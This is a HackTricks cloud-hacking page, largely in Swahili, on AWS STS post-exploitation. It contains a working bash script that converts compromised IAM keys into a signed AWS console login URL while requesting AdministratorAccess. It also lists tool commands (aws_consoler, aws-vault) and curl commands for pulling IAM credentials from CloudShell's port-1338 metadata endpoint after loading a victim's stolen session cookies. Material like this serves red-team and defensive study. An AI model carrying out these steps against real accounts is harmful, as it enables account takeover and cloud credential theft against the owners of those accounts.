AWS - STS Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

STS

Kwa maelezo zaidi:

AWS - IAM, Identity Center & SSO Enum

Kutoka kwa IAM Creds hadi Console

Ikiwa umeweza kupata baadhi ya akreditif za IAM huenda ukavutiwa na kuingia kwenye web console ukitumia zana zifuatazo. Kumbuka kwamba mtumiaji/role lazima awe na ruhusa sts:GetFederationToken.

Skripti ya Kawaida

Skripti ifuatayo itatumia profaili ya kawaida na eneo la AWS la kawaida (sio gov na sio cn) kukupa URL iliyosainiwa ambayo unaweza kutumia kuingia ndani ya web console:

# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)

if [ $? -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
fi

# Parse the output
session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo $output | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)



# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"

aws_consoler

Unaweza kuunda kiungo cha konsoli ya wavuti na https://github.com/NetSPI/aws_consoler.

cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console

Hakikisha mtumiaji wa IAM ana ruhusa ya sts:GetFederationToken, au toa jukumu la kukubali.

aws-vault

aws-vault ni chombo cha kuhifadhi na kufikia kwa usalama akidi za AWS katika mazingira ya maendeleo.

aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith

Unaweza pia kutumia aws-vault kupata session ya console ya kivinjari

Kutoka Console hadi IAM Creds

Iligunduliwa awali katika chapisho hili, Ikiwa utafanikiwa kuingilia baadhi ya ufikiaji wa console ya wavuti (labda ulipora vidakuzi na huwezi kufikia folda ya .aws), unaweza kupata baadhi ya akreditivu za token za IAM kwa ajili ya mtumiaji huyo kupitia CloudShell.

CloudShell inatoa akreditivu za IAM kupitia kiungo kisichoorodheshwa kwenye bandari 1338. Baada ya kupakia vidakuzi vya session kutoka kwa mwathirika kwenye kivinjari chako, unaweza kuhamasisha CloudShell na kutoa amri zifuatazo ili kupata akreditivu za IAM.

TOKEN=$(curl -X PUT localhost:1338/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60")
curl localhost:1338/latest/meta-data/container/security-credentials -H "X-aws-ec2-metadata-token: $TOKEN"

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousAWS - Step Functions Post Exploitation NextAWS - VPN Post Exploitation

Last updated 3 days ago